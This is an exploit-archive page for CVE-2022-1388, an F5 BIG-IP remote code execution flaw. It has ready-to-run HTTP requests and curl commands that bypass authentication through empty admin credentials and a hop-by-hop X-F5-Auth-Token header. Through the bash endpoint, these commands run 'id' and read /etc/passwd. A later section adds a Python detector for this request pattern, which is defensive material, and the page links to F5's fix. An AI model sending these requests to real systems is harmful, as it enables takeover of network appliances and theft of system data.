- F5 BIG-IP Remote Code Execution[6]
- Authored by Alt3kx[7] | Site github.com[8]
F5 BIG-IP remote code execution proof of concept exploit that leverages the vulnerability identified in CVE-2022-1388.
- advisories | CVE-2022-1388[9]
- SHA-256 | 2c3224e25af9797e9d7139c7d759da88b2eae07b09d164c4bf3a7423cfb95c06
# F5 BIG-IP RCE exploitation (CVE-2022-1388)
POST (1):

```http
POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c 'id' " }
```
curl command line:

```bash
$ curl -i -s -k -X $'POST' \
    -H $'Host: <redacted>:8443' \
    -H $'Authorization: Basic YWRtaW46' \
    -H $'Connection: keep-alive, X-F5-Auth-Token' \
    -H $'X-F5-Auth-Token: 0' \
    -H $'Content-Length: 52' \
    --data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a' \
    $'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080
```
POST (2):

```http
POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }
```
curl command line:

```bash
$ curl -i -s -k -X $'POST' \
    -H $'Host: <redacted>:8443' \
    -H $'Authorization: Basic YWRtaW46' \
    -H $'Connection: keep-alive, X-F5-Auth-Token' \
    -H $'X-F5-Auth-Token: 0' \
    --data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \' cat /etc/passwd\' \" }\x0d\x0a\x0d\x0a' \
    $'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080
```
Note:

The issue could be related to the split between front-end and back-end ("Jetty") authentication: the back end accepts the empty Basic credentials "admin:<empty>" once the front end has processed the header values, in particular the `Connection` header naming `X-F5-Auth-Token` as hop-by-hop (see "HTTP hop-by-hop request headers" below).
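As an added defender-side example (not part of the original PoC or of F5's code), the following checks a raw HTTP/1.1 request for the three traits the requests above combine: the iControl REST bash endpoint, `Connection` naming `X-F5-Auth-Token` as hop-by-hop, and Basic credentials decoding to `admin` with an empty password. The sample requests and the hostname `bigip.example.internal` are constructed for the test.

```python
import base64

# Constructed sample requests (not from the page): a PoC-shaped request, then a normal token call.
SAMPLE_REQUESTS = [
    "POST /mgmt/tm/util/bash HTTP/1.1\r\n"
    "Host: bigip.example.internal:8443\r\n"
    "Authorization: Basic YWRtaW46\r\n"
    "Connection: keep-alive, X-F5-Auth-Token\r\n"
    "X-F5-Auth-Token: 0\r\n\r\n"
    '{"command": "run", "utilCmdArgs": "-c \'id\'"}',
    "GET /mgmt/tm/sys/version HTTP/1.1\r\n"
    "Host: bigip.example.internal:8443\r\n"
    "X-F5-Auth-Token: EXAMPLETOKEN\r\n"
    "Connection: keep-alive\r\n\r\n",
]

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body); header names are lowercased."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def detect_cve_2022_1388(raw):
    """Return indicator strings for one request; an empty list means nothing matched."""
    method, path, headers, _body = parse_request(raw)
    findings = []
    if not path.startswith("/mgmt/"):
        return findings  # only the iControl REST interface is in scope
    # Hop-by-hop abuse: naming X-F5-Auth-Token in Connection asks the front end
    # to drop the token header before the request reaches the back end.
    connection_tokens = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    if "x-f5-auth-token" in connection_tokens:
        findings.append("x-f5-auth-token listed as hop-by-hop in Connection")
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            creds = base64.b64decode(auth[6:].strip()).decode("utf-8", "replace")
        except ValueError:
            creds = ""
        user, _, password = creds.partition(":")
        if user == "admin" and password == "":
            findings.append("basic auth as admin with empty password")
    if method == "POST" and path.startswith("/mgmt/tm/util/bash"):
        findings.append("POST to /mgmt/tm/util/bash (arbitrary command endpoint)")
    return findings
```

Any one finding on its own is worth a look at the management-plane access logs; all three together match the request pattern above.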
References and fixes:

* https://support.f5.com/csp/article/K23605346
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388

iControl REST documentation used (latest notes):

* https://clouddocs.f5.com/api/icontrol-rest/

HTTP hop-by-hop request headers:

* https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open
# Author
Alex Hernandez aka @_alt3kx_